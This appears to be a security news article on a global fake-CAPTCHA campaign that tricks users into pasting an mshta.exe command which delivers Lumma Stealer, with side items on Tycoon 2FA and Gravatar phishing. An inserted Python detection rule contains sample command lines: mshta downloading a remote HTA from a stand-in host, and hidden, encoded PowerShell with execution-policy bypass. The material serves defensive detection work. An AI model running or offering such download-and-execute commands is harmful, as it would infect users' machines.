Cybersecurity researchers are turning their attention to a new malware campaign that uses fake CAPTCHA checks to deliver the infamous Lumma information stealer.
“The campaign is global, and Netskope Threat Labs is tracking victims in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” said the report shared with The Hacker News.
“The campaign also spans multiple industries, including healthcare, banking and marketing, with the telecommunications industry having the largest number of targeted organizations.”
The attack chain begins when the victim visits a compromised website that redirects them to a fake CAPTCHA page. That page instructs the visitor to copy and paste a command into the Windows Run prompt; the command uses the native Windows binary mshta.exe to download and execute an HTA file from a remote server.
It should be noted that a previous iteration of this technique, widely known as ClickFix, involved executing a Base64-encoded PowerShell script to trigger a Lumma Stealer infection.
The HTA file in turn executes a PowerShell command to run the next-stage payload, a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before taking steps to bypass the Windows Antimalware Scan Interface (AMSI) in an attempt to evade detection.
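One way a detection engineer could express the chain described above (mshta.exe started from the Run prompt with a remote HTA, then PowerShell spawned from it) as a rule over process-creation telemetry. This is an added example written for this article, not Netskope's code; the Sysmon-style events and the `classify_event`/`triage` helpers are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://captcha.example.invalid/verify.hta"},
    {"parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -enc PLACEHOLDER"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "command_line": "notepad++.exe notes.txt"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)          # remote download in the command line
ENC_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)  # encoded PowerShell


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return the reasons this event matches the fake-CAPTCHA/Lumma chain; empty if benign."""
    parent, image, cmd = basename(ev["parent_image"]), basename(ev["image"]), ev["command_line"]
    reasons = []
    if image == "mshta.exe":
        if URL_RE.search(cmd) or ".hta" in cmd.lower():
            reasons.append("mshta.exe fetching a remote HTA")
        if parent == "explorer.exe":
            reasons.append("mshta.exe launched from explorer.exe (consistent with Win+R Run prompt)")
    if image in ("powershell.exe", "pwsh.exe"):
        if parent == "mshta.exe":
            reasons.append("PowerShell spawned by mshta.exe")
        if ENC_RE.search(cmd):
            reasons.append("encoded PowerShell command")
    return reasons


def triage(events):
    """Keep only matching events, paired with their reasons, for analyst review."""
    hits = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            hits.append((ev["command_line"], reasons))
    return hits
```

Both mshta.exe and PowerShell are legitimate tools, so the value is in the parent/child relationship and the remote URL rather than in the binary names alone.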
“By downloading and running malware in this way, an attacker avoids browser-based protections because the victim will perform all necessary actions outside the context of the browser,” Froes explained.
“Lumma Stealer operates using a malware-as-a-service (MaaS) model and has been very active in recent months. By using different delivery methods and payloads, it makes detection and blocking of such threats more difficult, especially when abusing user interactions within the system.”
As recently as this month, Lumma was also distributed via about 1,000 fake domains impersonating Reddit and WeTransfer, which redirect users to download password-protected archives.
These archive files contain an AutoIT dropper called SelfAU3 Dropper, which then launches the stealer, according to Sekoia researcher crep1x. In early 2023, threat actors leveraged a similar technique to create over 1,300 domains masquerading as AnyDesk to push the Vidar Stealer malware.
The development comes as Barracuda Networks detailed an updated version of the Phishing-as-a-Service (PhaaS) toolkit known as Tycoon 2FA, which includes advanced features to “interfere with, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These include using legitimate—possibly compromised—email accounts to send phishing emails, and taking a number of steps to prevent analysis by detecting automated security scripts, listening for keystrokes that suggest web inspection, and disabling right-click context menus.
There have also been social engineering-based credential harvesting attacks that use avatar provider Gravatar to impersonate various legitimate services, such as AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“Using Gravatar’s Profiles as a Service, attackers create convincing fake profiles that mimic legitimate services, tricking users into revealing their credentials,” said SlashNext Field CTO Stephen Kowski.
“Instead of conventional phishing attempts, attackers adapt their fake profiles to resemble legitimate services, which they impersonate through services that are often not known or secured.”